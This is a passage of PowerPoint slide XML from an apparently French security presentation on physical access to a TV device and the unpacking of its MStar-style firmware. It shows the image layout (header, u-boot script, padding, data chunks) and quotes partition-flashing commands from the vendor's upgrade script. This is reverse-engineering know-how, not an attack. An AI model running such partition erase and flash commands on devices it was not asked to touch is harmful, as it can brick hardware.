                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AE4EA7F-6584-FC50-513D-AD4C25F04451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyse du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0989BB9-04AD-586B-F838-6BE0D4C0FC7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="-35" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="403935" y="1315427"/>
            <a:ext cx="4680616" cy="3174023"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{460CDCC0-6932-7104-0136-728912992214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5390654" y="2571750"/>
            <a:ext cx="2880320" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>header textuel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Commentaire « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>mstar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170638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020BC-D513-6091-960E-DEDF62A89A2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Unpack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BF03638-7345-4986-964B-4D84706BD4D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE6ED7A-9B57-9583-3271-B72DFE51A28B}"/>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4C05DB98-F6D3-A43D-01DE-03EEC80E6D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2FCA334-80D0-B700-A929-04C825C1E32B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Analyse du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1837FF92-6AEA-2EC4-24BF-B921712C2540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="173853" y="1831295"/>
            <a:ext cx="4461647" cy="2245404"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43F5BA9C-6CFB-2276-E41B-6024AE6272DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279034" y="1941871"/>
            <a:ext cx="3635363" cy="2039447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flèche : droite 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56215D2A-C9D3-1B2E-5AA6-EC8E22CA27DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4635500" y="2811532"/>
            <a:ext cx="574005" cy="28493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468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3665904-A355-B6D4-2FAB-CBB506F46965}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3773984" y="1195925"/>
            <a:ext cx="5370015" cy="1446550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># File Partition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvservice</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mmc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>erase.p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvservice</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filepartload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x27800000 $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UpgradeImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) 0x1dce9000 0x24271dc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mmc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unlzo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x27800000 0x24271DC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvservice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filepartload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x27800000 $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UpgradeImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) 0x20111000 0x3362494</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mmc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unlzo.cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x27800000 0x3362494 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tvservice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[…]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0318A2AB-DA42-7067-D85A-EED9572AB0CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E97E9C44-7256-3B0C-D102-FAE640102C83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52BE262E-1C21-1887-1F6F-CD1BA20DF5B9}"/>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A00E9E0E-2F7E-CCF0-39A8-B3C08A16AFFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Accès physique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Espace réservé du texte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40105850-FBA2-487A-6213-D74D26AE0606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Format du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173C470A-BF6B-EA8F-2F61-2403CD508D08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110804" y="1231037"/>
            <a:ext cx="2376264" cy="578713"/>
          </a:xfrm>
          <a:prstGeom prst="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tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uboot</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9366C4BB-474C-22A0-89D2-549E5DF8C0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110802" y="1816794"/>
            <a:ext cx="2376264" cy="242538"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5">
            <a:fgClr>
              <a:schemeClr val="tx1"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:patt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tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>padding</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752BD5A3-69B7-D6F6-FC94-37A59264BC6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110804" y="2066377"/>
            <a:ext cx="2376264" cy="572661"/>
          </a:xfrm>
          <a:prstGeom prst="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tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60A74A2B-07E5-66EF-7C22-FDD2FC0387CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1110804" y="2881576"/>
            <a:ext cx="2376264" cy="572661"/>
          </a:xfrm>
          <a:prstGeom prst="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tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Accolade fermante 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15BD5CD1-FB5F-6ACB-591E-235FCFAA1CD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="859284" y="1231036"/>
            <a:ext cx="194806" cy="8282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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FF8271A-C156-B793-1188-CBA254E776A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1380454"/>
            <a:ext cx="936104" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x4000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
